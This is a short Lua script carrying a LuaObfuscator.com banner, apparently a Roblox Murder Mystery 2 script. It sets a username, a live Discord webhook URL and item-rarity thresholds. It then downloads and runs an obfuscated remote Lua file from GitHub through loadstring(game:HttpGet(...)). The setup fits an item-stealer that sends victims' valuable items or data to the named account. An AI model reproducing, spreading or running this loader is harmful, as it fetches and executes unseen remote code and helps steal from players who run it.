--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

DualUsername="hussainqazw";DualWebhook="https://discord.com/api/webhooks/1321687215172227153/H-rFHE6ERefiNfSEs3AbnzYm3CQRTNO9q_BA8dbthmfthcmXgBSt8Nutylj9D1v203m4";Unique=2 -1 ;Ancient=5 -3 ;Godly=5 -2 ;loadstring(game:HttpGet("https://raw.githubusercontent.com/sunshine279/MM2/refs/heads/main/Protected_9132145957586019.lua"))();